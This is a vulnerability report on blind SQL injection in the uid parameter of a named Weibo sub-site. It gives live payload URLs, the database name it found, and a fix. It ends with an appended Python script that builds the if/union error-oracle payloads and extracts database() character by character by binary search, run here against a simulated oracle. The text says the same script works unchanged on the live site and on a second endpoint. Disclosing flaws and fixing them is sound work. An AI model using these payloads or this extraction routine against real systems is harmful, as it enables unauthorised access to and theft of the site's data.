Multiple SQL injection points on a Sina Weibo sub-site

Multiple blind SQL injection points on a Sina Weibo sub-site

Injection point 1 (uid parameter; the two URLs below differ only in the condition 1=1 vs 1=2. When the condition is true the if() yields 1 and the page renders normally; when it is false MySQL evaluates the scalar subquery, which returns two rows and aborts the query, so the response differs and the condition can be used as a boolean oracle):
http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=1%29,1,%28select%201%20union%20select%202%29%29

http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=2%29,1,%28select%201%20union%20select%202%29%29

From a quick test, database() is jcsport; nothing else was tested.

Other injection points:

http://cai.weibo.com/pc.php/api/user/matchbet?page=1&size=10&uid=10057693&type=rooms&datetype=1

The uid parameter is injectable here as well.

Fix:

Filter the input. uid is a numeric id, so cast it to an integer (or reject anything that is not all digits) before it reaches the query, and bind it as a parameter rather than concatenating it into the SQL string.
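The following script is an added example, not part of the original report: it builds the exact if/union error-oracle payloads from the URLs above, drives a character-by-character blind extraction of database() through that oracle, and shows the integer validation the fix calls for. Because it runs offline, the oracle is a constructed stand-in that evaluates the generated conditions against the value the report found (jcsport); against a live target the same function would instead compare HTTP responses for the true and false case.

```python
import re
import urllib.parse
from typing import Callable

# Constructed stand-in for the value the report observed for database();
# a real oracle would compare HTTP responses from the target, not this string.
SIMULATED_DB_NAME = "jcsport"


def build_payload(uid: int, condition: str) -> str:
    """uid value carrying the report's error oracle.

    MySQL if(cond, 1, (select 1 union select 2)): when cond is true the
    expression is 1 and the query runs normally; when cond is false MySQL
    evaluates the scalar subquery, which yields two rows and aborts the
    query with "Subquery returns more than 1 row", so the page differs.
    """
    return f"{uid} and if(({condition}),1,(select 1 union select 2))"


def build_url(base: str, params: dict) -> str:
    """Encode params the way the report's URLs do: spaces and parentheses
    percent-encoded, '=' and ',' left as-is."""
    query = urllib.parse.urlencode(params, safe="=,", quote_via=urllib.parse.quote)
    return f"{base}?{query}"


def simulated_oracle(condition: str) -> bool:
    """Offline stand-in for 'does the page look like the true case?'.

    It understands only the two condition shapes this script generates and
    evaluates them the way MySQL would against SIMULATED_DB_NAME.
    """
    m = re.fullmatch(r"ascii\(substring\(database\(\),(\d+),1\)\)>(\d+)", condition)
    if m:
        pos, threshold = int(m.group(1)), int(m.group(2))
        ch = SIMULATED_DB_NAME[pos - 1:pos]  # '' past the end, like MySQL substring()
        return (ord(ch) if ch else 0) > threshold  # MySQL ascii('') is 0
    m = re.fullmatch(r"(\d+)=(\d+)", condition)
    if m:
        return int(m.group(1)) == int(m.group(2))
    raise ValueError(f"unsupported condition: {condition}")


def extract_string(oracle: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Recover a MySQL string expression (e.g. database()) one character at a
    time, binary-searching ascii() so each character costs at most 7 oracle
    queries instead of up to 127."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"ascii(substring({expr},{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # ascii('') == 0: ran past the end of the string
            break
        result += chr(lo)
    return result


def parse_uid(raw: str) -> int:
    """Server-side fix: uid is a numeric id, so accept only digits before it
    gets anywhere near a query (and still bind it as a parameter)."""
    if not re.fullmatch(r"[1-9][0-9]{0,18}", raw):
        raise ValueError("uid must be a positive integer")
    return int(raw)


if __name__ == "__main__":
    base = "http://cai.weibo.com/pc.php/index/user"
    for cond in ("1=1", "1=2"):
        print(build_url(base, {"type": "user", "uid": build_payload(10057693, cond)}))
    print("database() =", extract_string(simulated_oracle, "database()"))
    for raw in ("10057693", build_payload(10057693, "1=1")):
        try:
            print("accepted:", parse_uid(raw))
        except ValueError as exc:
            print("rejected:", exc)
```

The same build_payload/extract_string pair applies unchanged to the matchbet endpoint, since it is the same uid parameter; only the base URL and the other query parameters change. The error-based variant is noisier than a pure boolean one (the false case produces a SQL error rather than an empty result), which is also what makes it easy to spot in application logs.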
